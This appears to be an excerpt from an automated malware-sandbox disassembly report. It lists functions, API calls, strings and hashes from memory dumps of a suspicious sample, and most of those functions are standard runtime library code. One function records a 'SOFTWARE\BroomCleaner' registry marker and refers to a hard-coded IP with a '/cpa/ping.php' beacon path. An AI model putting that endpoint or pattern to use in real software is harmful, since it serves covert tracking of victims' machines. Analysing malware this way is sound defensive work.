Opcode ID: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
Instruction ID: f1eb2fe4340e97ed79650f57c8a8747809c023f352878a21904a4d61aa040acb
Opcode Fuzzy Hash: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
Instruction Fuzzy Hash: B7B12975A012199BDB24DF18D884BEEB7B4FF88304F5045AAE849A7350E735AED1CF48

Uniqueness

Uniqueness Score: -1.00%

Function 004145CC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

_free.LIBCMT ref: 004146D7
_free.LIBCMT ref: 004146EE
_free.LIBCMT ref: 0041470D
_free.LIBCMT ref: 00414728
_free.LIBCMT ref: 0041473F

Strings

B, xrefs: 0041461F
|B, xrefs: 004146B1

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: _free$AllocateHeap
String ID: B$|B
API String ID: 3033488037-200315465
Opcode ID: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
Instruction ID: bceed09af247e51911f2c06e24e965b8c83290834e1de00ea3c3fe4b0a612a45
Opcode Fuzzy Hash: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
Instruction Fuzzy Hash: F351E631A00304AFDB20DF66D841BAA77F4EF99728F14056EE849DB690E739DD81CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0041673F Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
__alloca_probe_16.LIBCMT ref: 004167D1
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
__alloca_probe_16.LIBCMT ref: 004168B6
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
__freea.LIBCMT ref: 00416926

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

__freea.LIBCMT ref: 0041692F
__freea.LIBCMT ref: 00416954

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
Instruction ID: 945c2db0b5faf58cb0d9801c543b0b3226d139e5166d8e9d93898d86eb794442
Opcode Fuzzy Hash: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
Instruction Fuzzy Hash: 2B51E6B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFC04D6280DB38DC90C668

Uniqueness

Uniqueness Score: -1.00%

Function 05B7F03E Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05B7F0AD
_free.LIBCMT ref: 05B7F0BB
_free.LIBCMT ref: 05B7F1E9
_free.LIBCMT ref: 05B7F1F4

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
Instruction ID: 815dd550ecce8a5d8dd7b23db9d96414f2836ba3b9a20b2360d0959191b8aff4
Opcode Fuzzy Hash: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
Instruction Fuzzy Hash: 8D61A275E44209AFDB20DFA8C840BAABBF5FF44710F1541AAE964EB240EB70B9418B54

Uniqueness

Uniqueness Score: -1.00%

Function 0041EDD7 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041EE46
_free.LIBCMT ref: 0041EE54
_free.LIBCMT ref: 0041EF82
_free.LIBCMT ref: 0041EF8D

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
Instruction ID: e986a1f43705154f11102f288933750ce46d6c5c7240a2201f23140d39e68ccb
Opcode Fuzzy Hash: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
Instruction Fuzzy Hash: 6761A076904305AFDB20DF66C842BDABBF4EF48710F1441ABEC44EB281D7749D828B98

Uniqueness

Uniqueness Score: -1.00%

Function 05B74833 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05B77CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B77CDE

_free.LIBCMT ref: 05B7493E
_free.LIBCMT ref: 05B74955
_free.LIBCMT ref: 05B74974
_free.LIBCMT ref: 05B7498F
_free.LIBCMT ref: 05B749A6

Strings

B, xrefs: 05B74886

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: B
API String ID: 3033488037-2386870291
Opcode ID: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
Instruction ID: 2bd193db1208650c832d7312aa591d63aa420e5637344b0c407a32ccf4a5fe52
Opcode Fuzzy Hash: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
Instruction Fuzzy Hash: CE519E32A0070CAFDB21DF69D841A7A77F5FF49721B5405A9E86ADB250E731FA01CB81

Uniqueness

Uniqueness Score: -1.00%

Function 05B75C7A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,05B763EF,?,?,?,?,?,?), ref: 05B75CBC
__fassign.LIBCMT ref: 05B75D37
__fassign.LIBCMT ref: 05B75D52
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 05B75D78
WriteFile.KERNEL32(?,?,00000000,05B763EF,00000000,?,?,?,?,?,?,?,?,?,05B763EF,?), ref: 05B75D97
WriteFile.KERNEL32(?,?,00000001,05B763EF,00000000,?,?,?,?,?,?,?,?,?,05B763EF,?), ref: 05B75DD0

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
Instruction ID: 57fe4a6488143d51e32631d76497eb73602ac25a079c52350b8859a79c24cf9a
Opcode Fuzzy Hash: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
Instruction Fuzzy Hash: CB519771A002499FDB20CFA8DC85BEEBBF5FF09310F14419AE565E7291D730A951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415A13 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
__fassign.LIBCMT ref: 00415AD0
__fassign.LIBCMT ref: 00415AEB
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
Instruction ID: 93abb8da7f4b1ee22325e29d014a78f54aaad6af2ae94e442d530b7aeff6bc03
Opcode Fuzzy Hash: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
Instruction Fuzzy Hash: 7851E6B0A04609DFDB10CFA8D881BEEBBF4EF49310F14416BE955E7251D774A981CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0040A6FB
___except_validate_context_record.LIBVCRUNTIME ref: 0040A703
_ValidateLocalCookies.LIBCMT ref: 0040A791
__IsNonwritableInCurrentImage.LIBCMT ref: 0040A7BC
_ValidateLocalCookies.LIBCMT ref: 0040A811

Strings

csm, xrefs: 0040A7A6

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction ID: 23505c37bb0df54e9d772fc2403dd448dd449399a7c5e18b9979e78af1eb181c
Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction Fuzzy Hash: B7415274E003089BCB10DF69C884A9EBBB5AF45318F14C17BE8156B3D2D739D925CB96

Uniqueness

Uniqueness Score: -1.00%

Function 05B863C1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05B863C6
RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 05B863EE
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 05B86471
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 05B86492

Strings

SOFTWARE\BroomCleaner, xrefs: 05B863CE, 05B863E1
Installed, xrefs: 05B863D0, 05B863FE, 05B8641D, 05B8641E

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction ID: 29b613f055809f98972381ddf793a45ff8822c878789424936ac3029dfcb5ea8
Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction Fuzzy Hash: 77319A71A00219EFDF149FA8CC94AFEBB79FB48254F0455ADE80277251C7726D05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004227A8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81ada43cddaa793191611bc99ca2e9e8f2b927b510fc63ccdaad96e19ac5d437
Instruction ID: e24961ea6169977100e6de332b8cae97d730c3ba4f888c233ff9c32580c66a3b
Opcode Fuzzy Hash: 81ada43cddaa793191611bc99ca2e9e8f2b927b510fc63ccdaad96e19ac5d437
Instruction Fuzzy Hash: 1611E7726081297BDB203F739D059AB3A6CDF92764B51062AFC15D7251DABCC84282B9

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2AC Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041EFF3: _free.LIBCMT ref: 0041F01C

_free.LIBCMT ref: 0041F2FA

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F305
_free.LIBCMT ref: 0041F310
_free.LIBCMT ref: 0041F364
_free.LIBCMT ref: 0041F36F
_free.LIBCMT ref: 0041F37A
_free.LIBCMT ref: 0041F385

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction ID: be7813cec9e76b844f682d4c097dbd82c10abeb52ecb146189267b1763b940f2
Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction Fuzzy Hash: 1F114272541B24B6D920BB72DC07FCBB7DCBF44708F40081EBE9E66052DA7DB5868654

Uniqueness

Uniqueness Score: -1.00%

Function 05B643F0 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05B643F5
std::_Lockit::_Lockit.LIBCPMT ref: 05B64404
int.LIBCPMT ref: 05B6441B

Part of subcall function 05B6157F: std::_Lockit::_Lockit.LIBCPMT ref: 05B61590
Part of subcall function 05B6157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05B615AA

std::locale::_Getfacet.LIBCPMT ref: 05B64424
std::_Facet_Register.LIBCPMT ref: 05B64455
std::_Lockit::~_Lockit.LIBCPMT ref: 05B6446B
__CxxThrowException@8.LIBVCRUNTIME ref: 05B64491

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction ID: 6a2360eb67e8238a01fd11ff7a14adb849d4e109c4f20688cc656282eb38ede5
Opcode Fuzzy Hash: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction Fuzzy Hash: E411C472A00518DBCF04EBA8D849AEE7775FF84214F1545EAE816A7290DF78BA01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00404189 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040418E
std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
int.LIBCPMT ref: 004041B4

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 004041BD
std::_Facet_Register.LIBCPMT ref: 004041EE
std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
__CxxThrowException@8.LIBVCRUNTIME ref: 0040422A

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: f83ec763f7aa7bb0e71e0afca0b1f6b0fdff92c65dad6a05f866a88dfb1858cd
Instruction ID: eeb1616ca6cccce41a0e0e35b82109652f5c3a79b41a9d78a32d17684d72b000
Opcode Fuzzy Hash: f83ec763f7aa7bb0e71e0afca0b1f6b0fdff92c65dad6a05f866a88dfb1858cd
Instruction Fuzzy Hash: AD119072A041289BCB04EBA5DC06AEE7774EF84358F10456FF915B72D1DB389A04C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 05B63651 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05B63656
std::_Lockit::_Lockit.LIBCPMT ref: 05B63665
int.LIBCPMT ref: 05B6367C

Part of subcall function 05B6157F: std::_Lockit::_Lockit.LIBCPMT ref: 05B61590
Part of subcall function 05B6157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05B615AA

std::locale::_Getfacet.LIBCPMT ref: 05B63685
std::_Facet_Register.LIBCPMT ref: 05B636B6
std::_Lockit::~_Lockit.LIBCPMT ref: 05B636CC
__CxxThrowException@8.LIBVCRUNTIME ref: 05B636F2

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction ID: 5febd39db5755c11e5c92c6138c656394535b4df22a5de936f3f91b2d1e4f48f
Opcode Fuzzy Hash: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction Fuzzy Hash: F311A372E041299BCB05EBA8C808AEE77B5EF44314F14099AE916B7290DF78AA04C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 05B6385C Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05B63861
std::_Lockit::_Lockit.LIBCPMT ref: 05B63870
int.LIBCPMT ref: 05B63887

Part of subcall function 05B6157F: std::_Lockit::_Lockit.LIBCPMT ref: 05B61590
Part of subcall function 05B6157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05B615AA

std::locale::_Getfacet.LIBCPMT ref: 05B63890
std::_Facet_Register.LIBCPMT ref: 05B638C1
std::_Lockit::~_Lockit.LIBCPMT ref: 05B638D7
__CxxThrowException@8.LIBVCRUNTIME ref: 05B638FD

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction ID: 94c90733cee5f8556560073f9706d4d04d3ae873359fda28736436b9b8123f03
Opcode Fuzzy Hash: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction Fuzzy Hash: FE11A772E00114DBCB05EBA8C808AFEB7B5EF44714F14499AE916B7290DF78AA04C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 004033EA Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004033EF
std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
int.LIBCPMT ref: 00403415

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 0040341E
std::_Facet_Register.LIBCPMT ref: 0040344F
std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
__CxxThrowException@8.LIBVCRUNTIME ref: 0040348B

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 963e99d2a39154fcb044ec2c7a4747b24090c51ae6fc69322cb5dc4ce8462b5c
Instruction ID: cdc69c2a9e90ba919e1258be772e803faed7ee3eebec81448dba6679bc4cf361
Opcode Fuzzy Hash: 963e99d2a39154fcb044ec2c7a4747b24090c51ae6fc69322cb5dc4ce8462b5c
Instruction Fuzzy Hash: 8E11BF329001289BCB05EFA4C815AEE7B78EF84319F10452EE911BB2D1DB789A04CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004035F5 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004035FA
std::_Lockit::_Lockit.LIBCPMT ref: 00403609
int.LIBCPMT ref: 00403620

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 00403629
std::_Facet_Register.LIBCPMT ref: 0040365A
std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
__CxxThrowException@8.LIBVCRUNTIME ref: 00403696

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 0fee8ea1c5c1463a8a6083934962415d071b04a09301998d0775e2a02c1fcd71
Instruction ID: 76a64bb1f13388b8652502aa8a079a3a0bf37f657045f8e793a704159d5c315e
Opcode Fuzzy Hash: 0fee8ea1c5c1463a8a6083934962415d071b04a09301998d0775e2a02c1fcd71
Instruction Fuzzy Hash: FA119032900124ABCB14EF65C805AEE7B74AF48319F10456FE911B73D1DB389A04C799

Uniqueness

Uniqueness Score: -1.00%

Function 05B87D27 Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 05B87E37
__FindPESection.LIBCMT ref: 05B87E51

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction ID: 94514a1e67d8d75339d0c32965bf0c51347cabf5509daa622983180949d20780
Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction Fuzzy Hash: FAA1AD72A04655CBCB15EF58C884ABDB7B5FB08318F2466A9E805AB351DB36FC01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00427AC0 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 00427BD0
__FindPESection.LIBCMT ref: 00427BEA

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction ID: 52cd69d4b64803fa133344d4e9d29b6b42e74987d25fff38166c3f8cc652100c
Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction Fuzzy Hash: 73A1D172B08225CFCB15CF69E9807AEB7B4EB44314F95466AD805EB351D739EC00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 05B769A6 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,05B76BF7,00000001,00000001,?), ref: 05B76A00
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,05B76BF7,00000001,00000001,?,?,?,?), ref: 05B76A86
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 05B76B80
__freea.LIBCMT ref: 05B76B8D

Part of subcall function 05B77CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B77CDE

__freea.LIBCMT ref: 05B76B96
__freea.LIBCMT ref: 05B76BBB

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
Instruction ID: b10ec967f6696d666019842b7a9e77736311c0d8232f49217ced9302b4222727
Opcode Fuzzy Hash: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
Instruction Fuzzy Hash: 8851F372700A1AAFDB258F64CC86EBB77AAEB45750F1542A9FD25D7240DB34FC40C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 05B71CD3 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 05B71CFF
__cftoe.LIBCMT ref: 05B71D31

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
Instruction ID: 76ec6f6bd699df417822c6b6c069642e788c3407ef08bc95dcdee177d3146c75
Opcode Fuzzy Hash: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
Instruction Fuzzy Hash: F051EB72A0460DABDF249FAD8C49EBE77B9FF49360F104199E83596190EB31F640CA74

Uniqueness

Uniqueness Score: -1.00%

Function 00411A6C Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00411A98
__cftoe.LIBCMT ref: 00411ACA

Memory Dump Source

